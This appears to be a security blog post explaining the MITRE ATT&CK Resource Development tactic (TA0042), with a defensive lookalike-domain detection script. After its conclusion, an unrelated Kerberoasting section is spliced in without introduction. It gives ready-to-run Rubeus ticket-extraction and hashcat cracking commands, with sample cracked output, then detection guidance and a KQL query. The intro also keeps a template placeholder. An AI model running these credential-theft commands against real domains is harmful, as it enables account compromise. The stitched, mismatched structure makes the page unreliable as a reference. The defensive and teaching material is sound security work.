TA0042

MITRE ATT&CK TACTIC Resource Development
security

Learn about Resource Development (TA0042), a MITRE ATT&CK tactic with X associated techniques. Beginner-friendly guide for security teams.


TA0042 - Resource Development Tactics Dissected

👤 mindhackdiva 📅 March 21, 2026 ⏱ 15 min read
MITRE ATT&CK Tactics Cyber Defense Tactics, Techniques, Procedures (TTPs) Blue Team Defensive Operations

Introduction to MITRE ATT&CK - Resource Development (TA0042)

In the MITRE ATT&CK model, Resource Development (TA0042) represents the phase in which an adversary creates, purchases, or compromises the infrastructure, capabilities, and operational assets required to execute an intrusion. While reconnaissance focuses on understanding the target, resource development is about building the tools, identities, and platforms needed to act on the intelligence gathered. This phase usually occurs entirely outside the victim environment, which makes it difficult to detect, yet it is one of the most important stages in determining the overall success, scalability, and stealth of an operation.

Infrastructure Acquisition and Setup

Resource development begins with the establishment of adversary-controlled infrastructure. Adversaries acquire domains, provision servers, and configure hosting environments that will later support Command and Control (C2), payload delivery, phishing campaigns, or data exfiltration. These resources are rarely created in a straightforward or attributable manner. Instead, adversaries layer obfuscation: privacy-protected domain registrations, offshore or otherwise uncooperative hosting providers, legitimate third-party services (cloud storage, CDNs, collaboration platforms) used as cover, and intermediary or proxied systems that mask the true origin of traffic. The infrastructure is often designed to appear legitimate, mimicking trusted services or blending into normal internet traffic patterns. For example, domains may be crafted to resemble the target organization or a commonly used service, increasing the likelihood that users will trust them during phishing or redirection scenarios.

Tooling Development and Capability Building

In parallel with infrastructure setup, adversaries develop or acquire the tooling necessary to execute their operations. This includes malware, exploit frameworks, credential harvesting kits, and post-exploitation utilities. In many cases, adversaries do not build these tools from scratch; instead, they adapt publicly available frameworks, modify existing malware families, or purchase capabilities from underground marketplaces. The emphasis is on customization and evasion, ensuring that tools are tailored to the specific environment identified during the reconnaissance phase. This may involve altering code to defeat signature-based antivirus detection, embedding configuration data specific to the target, or using communication protocols that align with the target's normal network behavior. The result is a toolkit that is both functional and difficult to detect with standard defensive mechanisms.

Account Acquisition and Identity Preparation

Another critical component of resource development is the acquisition and preparation of accounts. Adversaries often create or obtain email accounts, social media profiles, and other digital identities that will be used to interact with the target. These accounts are carefully curated to appear legitimate, sometimes maintained over long periods to establish credibility. In more advanced operations, adversaries may compromise existing accounts or purchase access to aged accounts with established histories, which are far harder to distinguish from genuine users than freshly created ones. These identities serve multiple purposes, from delivering phishing emails to engaging in social engineering interactions, and are often aligned with the organizational context discovered during reconnaissance. For example, an adversary targeting a specific department may create accounts that appear to belong to colleagues, vendors, or internal support staff.

Staging and Operational Testing

Staging and testing are also integral to this phase. Before launching an operation, adversaries validate their infrastructure and tools in controlled environments to ensure reliability and stealth. This may involve testing phishing templates against spam filters, verifying that Command and Control (C2) channels are resilient and undetected, submitting payloads to the same antivirus products the target uses, or simulating interactions with target-like systems to confirm exploit effectiveness. These tests are not arbitrary; they are informed by the intelligence gathered during reconnaissance and are designed to replicate the exact conditions the adversary expects to encounter. By the time the operation begins, the adversary has already resolved many potential points of failure, increasing the likelihood of a smooth and successful intrusion.

Payload and Delivery Mechanism Preparation

Resource development also includes the preparation of delivery mechanisms. Phishing templates, malicious documents and attachments, exploit-laden web pages, and payload hosting systems are all crafted during this stage. These elements are often highly customized, incorporating language, branding, and contextual details specific to the target organization. The goal is to reduce suspicion and increase engagement, whether that means convincing a user to open an attachment, click a link, or provide credentials. In more advanced scenarios, adversaries may develop multi-staged delivery chains, where initial interactions lead to secondary payloads or redirections, further complicating detection and analysis for defenders.

Operational Security (OPSEC) and Defensive Resilience

An important but less visible aspect of resource development is the establishment of Operational Security (OPSEC) measures. Adversaries take deliberate steps to protect their infrastructure and personas from attribution and disruption. This includes using anonymization services, rotating infrastructure components, segmenting operations across multiple platforms, and implementing fallback mechanisms in case parts of the operation are detected and blocked. For example, an adversary may register multiple backup domains, configure redundant C2 servers, or design malware to switch communication channels if its primary path is disrupted. These calculated precautions ensure that the operation can continue even under defensive pressure, reflecting a level of planning that goes beyond simple opportunistic attacks.

Integration into Operational Framework

As resource development progresses, the adversary begins to align all components into a cohesive operational framework. Infrastructure, tools, identities, and delivery mechanisms are integrated in a way that supports the chosen attack path. This integration is not merely technical; it is strategic. Each component is selected and configured based on its role in the broader operation, ensuring that the transition into the Initial Access phase is seamless. By the time the adversary is ready to engage the target directly, they are not improvising; they are executing a pre-planned sequence of actions that is fully supported by a well-prepared environment.

Defensive Visibility and Detection Gaps

From a defensive standpoint, resource development is particularly challenging to address because it occurs largely outside the organization's visibility and perimeter. The infrastructure and accounts used by adversaries are often indistinguishable from legitimate resources until they are actively used in an attack. There are, however, indirect indicators that provide some insight into this phase. Monitoring newly registered domains and certificate transparency logs for names that resemble the organization, tracking brand impersonation, and analyzing threat intelligence feeds for emerging infrastructure patterns can help identify potential threats before they are deployed. Additionally, understanding common adversary behaviors in resource development, such as domain naming conventions, hosting patterns, and tooling reuse, improves an organization's ability to anticipate and mitigate forthcoming attacks.
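The lookalike-domain monitoring described above is easy to automate. The following is an added example, not code from the original page: it generates the typosquat permutations an adversary is likely to register for an organization's domain (omission, transposition, repetition, homoglyph and suffix abuse), then scores entries from a newly-registered-domain feed against them. The organization name `corpbank`, the feed contents and the score weights are all constructed for the demo; the TLD split is a plain last-label split rather than a public suffix list, so multi-part suffixes such as `.co.uk` would need a real suffix list in production.

```python
from __future__ import annotations

# Homoglyph / keyboard-confusable substitutions commonly seen in lookalike domains.
CONFUSABLES = {
    "a": ["4", "q"], "e": ["3"], "i": ["1", "l"], "l": ["1", "i"],
    "o": ["0"], "s": ["5"], "m": ["rn"], "rn": ["m"], "w": ["vv"],
}


def lookalike_variants(label: str) -> set[str]:
    """Generate common typosquat permutations of a single domain label."""
    variants = set()
    for i in range(len(label)):                      # omission: corpbank -> corpbnk
        variants.add(label[:i] + label[i + 1:])
    for i in range(len(label) - 1):                  # transposition: corpbank -> cropbank
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(len(label)):                      # repetition: corpbank -> corppbank
        variants.add(label[:i] + label[i] + label[i:])
    for src, repls in CONFUSABLES.items():           # homoglyphs: corpbank -> c0rpbank
        start = 0
        while (pos := label.find(src, start)) != -1:
            for r in repls:
                variants.add(label[:pos] + r + label[pos + len(src):])
            start = pos + 1
    for suffix in ("-login", "-secure", "-support"):  # suffix abuse: corpbank-login
        variants.add(label + suffix)
    variants.discard(label)
    return {v for v in variants if v}


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; catches single-character insertions the rules above miss."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score_domain(candidate: str, org_label: str, org_tlds: set[str]) -> tuple[int, str]:
    """Return (suspicion score, reason). Higher means more likely an impersonation."""
    parts = candidate.lower().strip(".").split(".")
    if len(parts) < 2:
        return 0, "not a fully qualified domain"
    tld, labels = parts[-1], parts[:-1]
    registrable = labels[-1]                          # label directly under the TLD (simplification)
    if registrable == org_label:
        if tld in org_tlds:
            return 0, "organisation's own domain"
        return 90, f"brand label under unexpected TLD .{tld}"
    if any(org_label in lab for lab in labels):       # corpbank-login.com, corpbank.com.evil.net
        return 80, "brand label embedded in a non-brand domain"
    if registrable in lookalike_variants(org_label):
        return 70, "known typosquat permutation"
    if len(org_label) >= 6 and levenshtein(registrable, org_label) <= 2:
        return 50, "within edit distance 2 of brand label"
    return 0, "no resemblance"


def triage_feed(feed: list[str], org_label: str, org_tlds: set[str], threshold: int = 50):
    """Score every domain in a feed and return the hits, most suspicious first."""
    hits = []
    for domain in feed:
        score, reason = score_domain(domain, org_label, org_tlds)
        if score >= threshold:
            hits.append((domain, score, reason))
    return sorted(hits, key=lambda h: (-h[1], h[0]))


# Constructed stand-in for a daily newly-registered-domain feed.
NEW_DOMAINS = [
    "corpbank.net", "c0rpbank.com", "corpbank-login.com", "secure.corpbank.co",
    "cropbank.com", "corpbnak.com", "korpbank.com", "corpbank.com.evil.net",
    "corpbank.com", "weather-today.org", "bankcorp.com",
]

if __name__ == "__main__":
    for domain, score, reason in triage_feed(NEW_DOMAINS, "corpbank", {"com"}):
        print(f"{score:3d}  {domain:28s} {reason}")
```

Scores are a triage aid, not a verdict: a hit should feed a registration-date, WHOIS and DNS/MX lookup before anyone blocks or reports it, and the brand-embedded rule in particular will fire on legitimate partner or fan sites.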

From Preparation to Execution Capability

Ultimately, resource development is where intent becomes capability. It transforms the insights gained during reconnaissance into tangible assets that enable action. The sophistication of this phase often reflects the overall maturity of the adversary: well-resourced and highly skilled actors invest significant time and effort into building robust, adaptable infrastructure and toolsets, while less advanced adversaries rely on readily available resources with minimal customization. Regardless of the level of sophistication, the outcome is the same: a prepared adversary with the means to initiate an intrusion. The quality and completeness of this preparation directly influence the effectiveness, stealth, and persistence of the attack that follows.

ℹ️
Kerberoasting requires only a valid domain user account — no elevated privileges are needed to request service tickets, making it a low-barrier, high-impact attack.

Extract Tickets with Rubeus

Rubeus is a C# toolset for Kerberos interaction and abuse. It can request and extract service tickets in a crackable format:

```cmd
# Request tickets for all kerberoastable accounts (user accounts with an SPN)
Rubeus.exe kerberoast /outfile:hashes.txt

# Target a specific SPN
Rubeus.exe kerberoast /spn:MSSQLSvc/db01.corp.local:1433

# Use the tgtdeleg trick to request RC4-encrypted tickets, which crack far faster
# than AES; the RC4 (0x17) TGS requests are also exactly what defenders alert on
Rubeus.exe kerberoast /tgtdeleg
```

Crack with Hashcat

```bash
# Crack Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

# AES tickets are much slower: etype 17 (AES128) is mode 19600, etype 18 (AES256) is mode 19700
hashcat -m 19600 hashes.txt wordlist.txt -r rules/best64.rule
hashcat -m 19700 hashes.txt wordlist.txt -r rules/best64.rule

# Check results
hashcat -m 13100 hashes.txt --show
$krb5tgs$23$*svc_sql$CORP.LOCAL*$...:Summer2024!
```
⚠️
Legal Notice: Only perform Kerberoasting attacks against systems you are authorized to test. Unauthorized access to computer systems is a criminal offense under laws such as the CFAA (US) and Computer Misuse Act (UK).

Detection & Defense

Defending against Kerberoasting requires a multi-layered approach combining preventive controls and detection mechanisms:

Preventive Controls

  • Strong service account passwords: Use 25+ character randomly generated passwords for every user account that carries an SPN; the attacker gets unlimited offline guesses, so only length defeats cracking
  • Group Managed Service Accounts (gMSA): Windows generates and rotates a 240-byte random password automatically (every 30 days by default), so there is nothing guessable to crack
  • AES only: Set msDS-SupportedEncryptionTypes on service accounts (and the Kerberos encryption-types GPO) so the KDC issues AES128/AES256 tickets and never RC4_HMAC_MD5; AES cracking is orders of magnitude slower, though a weak password still falls
  • Minimize SPNs: Audit and remove unnecessary SPNs from user accounts; use computer accounts, whose passwords are long and rotated, where possible
  • Privileged Access Management: Avoid assigning Domain Admin or other high-privilege group memberships to service accounts, so a cracked ticket does not hand over the domain
KQL (Microsoft Sentinel)

```kql
// Detect potential Kerberoasting: one requester pulling RC4 service tickets
// for many distinct service accounts inside a short window
SecurityEvent
| where EventID == 4769
| where Status == "0x0"                    // successful requests only
| where TicketEncryptionType == "0x17"     // RC4-HMAC
| where ServiceName !endswith "$"          // exclude machine accounts
| where ServiceName !~ "krbtgt"            // exclude TGT requests/renewals
| summarize Services=dcount(ServiceName), Count=count()
    by TargetUserName, IpAddress, bin(TimeGenerated, 5m)
| where Services > 5
```

Counting distinct service names rather than raw events keeps a single chatty application that repeatedly asks for the same SPN from tripping the rule, while a roasting tool that sweeps every SPN in the domain still does.